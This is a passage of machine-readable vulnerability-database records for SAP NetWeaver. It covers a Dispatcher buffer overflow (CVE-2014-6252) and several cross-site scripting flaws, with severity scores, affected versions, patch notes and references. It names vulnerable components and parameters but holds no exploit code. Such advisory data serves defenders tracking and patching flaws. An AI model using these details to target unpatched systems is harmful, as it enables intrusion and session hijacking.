"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-6252"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "George Nosenko (ERPScan)",
"sources": [
{
"db": "BID",
"id": "69657"
}
],
"trust": 0.3
},
"cve": "CVE-2014-6252",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2014-6252",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CNVD-2014-05482",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "IVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "fbaaf204-1ec0-11e6-abef-000c29c66e3d",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-6252",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2014-05482",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201409-049",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "fbaaf204-1ec0-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "fbaaf204-1ec0-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-05482"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004060"
},
{
"db": "NVD",
"id": "CVE-2014-6252"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-049"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow in disp+work.exe 7000.52.12.34966 and 7200.117.19.50294 in the Dispatcher in SAP NetWeaver 7.00 and 7.20 allows remote authenticated users to cause a denial of service or execute arbitrary code via unspecified vectors. SAP NetWeaver is the technical foundation of SAP\u0027s integrated technology platform and all SAP applications since SAP Business Suite. A buffer overflow vulnerability exists in SAP NetWeaver \u0027disp+work.exe\u0027. Failed exploit attempts may result in a denial-of-service condition",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-6252"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004060"
},
{
"db": "CNVD",
"id": "CNVD-2014-05482"
},
{
"db": "BID",
"id": "69657"
},
{
"db": "IVD",
"id": "fbaaf204-1ec0-11e6-abef-000c29c66e3d"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-6252",
"trust": 3.5
},
{
"db": "SECUNIA",
"id": "60496",
"trust": 2.2
},
{
"db": "BID",
"id": "69657",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2014-05482",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201409-049",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004060",
"trust": 0.8
},
{
"db": "OSVDB",
"id": "110609",
"trust": 0.6
},
{
"db": "IVD",
"id": "FBAAF204-1EC0-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "fbaaf204-1ec0-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-05482"
},
{
"db": "BID",
"id": "69657"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004060"
},
{
"db": "NVD",
"id": "CVE-2014-6252"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-049"
}
]
},
"id": "VAR-201409-0531",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "fbaaf204-1ec0-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-05482"
}
],
"trust": 1.07111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "fbaaf204-1ec0-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-05482"
}
]
},
"last_update_date": "2023-12-18T13:34:36.693000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 2018221",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"title": "SAP NetWeaver \u0027disp+work.exe\u0027 patch for buffer overflow vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/49764"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-05482"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004060"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-004060"
},
{
"db": "NVD",
"id": "CVE-2014-6252"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://erpscan.com/advisories/erpscan-14-011-sap-netweaver-dispatcher-buffer-overflow-rce-dos/"
},
{
"trust": 1.6,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/60496"
},
{
"trust": 1.6,
"url": "https://service.sap.com/sap/support/notes/2018221"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-14-011-sap-netweaver-dispatcher-buffer-overflow-rce-dos/"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/96196"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-6252"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-6252"
},
{
"trust": 0.6,
"url": "http://secunia.com/advisories/60496/"
},
{
"trust": 0.6,
"url": "http://osvdb.com/show/osvdb/110609"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-05482"
},
{
"db": "BID",
"id": "69657"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004060"
},
{
"db": "NVD",
"id": "CVE-2014-6252"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-049"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "fbaaf204-1ec0-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-05482"
},
{
"db": "BID",
"id": "69657"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004060"
},
{
"db": "NVD",
"id": "CVE-2014-6252"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-049"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-09-09T00:00:00",
"db": "IVD",
"id": "fbaaf204-1ec0-11e6-abef-000c29c66e3d"
},
{
"date": "2014-09-09T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-05482"
},
{
"date": "2014-08-21T00:00:00",
"db": "BID",
"id": "69657"
},
{
"date": "2014-09-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-004060"
},
{
"date": "2014-09-05T14:55:05.270000",
"db": "NVD",
"id": "CVE-2014-6252"
},
{
"date": "2014-09-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201409-049"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-09-09T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-05482"
},
{
"date": "2014-08-21T00:00:00",
"db": "BID",
"id": "69657"
},
{
"date": "2014-09-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-004060"
},
{
"date": "2018-12-10T19:29:04.390000",
"db": "NVD",
"id": "CVE-2014-6252"
},
{
"date": "2014-09-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201409-049"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201409-049"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver \u0027disp+work.exe\u0027 Buffer Overflow Vulnerability",
"sources": [
{
"db": "IVD",
"id": "fbaaf204-1ec0-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-05482"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow",
"sources": [
{
"db": "IVD",
"id": "fbaaf204-1ec0-11e6-abef-000c29c66e3d"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-049"
}
],
"trust": 0.8
}
}
var-201705-4221
Vulnerability from variot
SAP Netweaver is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201705-4221",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "98358"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP.",
"sources": [
{
"db": "BID",
"id": "98358"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.\nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.",
"sources": [
{
"db": "BID",
"id": "98358"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "98358",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "98358"
}
]
},
"id": "VAR-201705-4221",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T02:01:05.076000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/05/09/sap-security-patch-day-may-2017"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2443586"
}
],
"sources": [
{
"db": "BID",
"id": "98358"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "98358"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-05-09T00:00:00",
"db": "BID",
"id": "98358"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-05-23T16:23:00",
"db": "BID",
"id": "98358"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "98358"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver Authentication and SSO Cross Site Scripting Vulnerability",
"sources": [
{
"db": "BID",
"id": "98358"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "98358"
}
],
"trust": 0.3
}
}
var-201007-0348
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. SAP NetWeaver has input validation errors that can be exploited by remote attackers for cross-site scripting attacks. Inputs passed to testsdic via the \"action\" parameter and passed to paramhelp.jsp via the \"helpstring\" parameter in the System Landscape directory component are not filtered before returning to the user, and the attacker can exploit the vulnerability to gain sensitive information or hijack the target user session
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201007-0348",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "web application server",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "6.x"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.x"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "4.x(2004)"
},
{
"model": "enterprise portal",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "6.x"
},
{
"model": "web application server",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.x"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.x*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "4.x(2004)*"
},
{
"model": "enterprise portal",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "6.x*"
},
{
"model": "web application server",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.x*"
}
],
"sources": [
{
"db": "IVD",
"id": "ce3cb788-1fb2-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-1445"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "ce3cb788-1fb2-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "ce3cb788-1fb2-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "ce3cb788-1fb2-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. SAP NetWeaver has input validation errors that can be exploited by remote attackers for cross-site scripting attacks. Inputs passed to testsdic via the \\\"action\\\" parameter and passed to paramhelp.jsp via the \\\"helpstring\\\" parameter in the System Landscape directory component are not filtered before returning to the user, and the attacker can exploit the vulnerability to gain sensitive information or hijack the target user session",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-1445"
},
{
"db": "IVD",
"id": "ce3cb788-1fb2-11e6-abef-000c29c66e3d"
}
],
"trust": 0.72
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2010-1445",
"trust": 0.8
},
{
"db": "IVD",
"id": "CE3CB788-1FB2-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "ce3cb788-1fb2-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-1445"
}
]
},
"id": "VAR-201007-0348",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "ce3cb788-1fb2-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-1445"
}
],
"trust": 1.1487727533333334
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "ce3cb788-1fb2-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-1445"
}
]
},
"last_update_date": "2022-05-17T01:46:48.506000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=168http"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-1445"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "ce3cb788-1fb2-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-1445"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-07-29T00:00:00",
"db": "IVD",
"id": "ce3cb788-1fb2-11e6-abef-000c29c66e3d"
},
{
"date": "2010-07-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1445"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-07-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1445"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver System Landscape Catalog Component Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-1445"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting",
"sources": [
{
"db": "IVD",
"id": "ce3cb788-1fb2-11e6-abef-000c29c66e3d"
}
],
"trust": 0.2
}
}
var-201206-0646
Vulnerability from variot
SAP Netweaver is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. SAP Netweaver 7.02 is vulnerable; other versions may also be affected.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
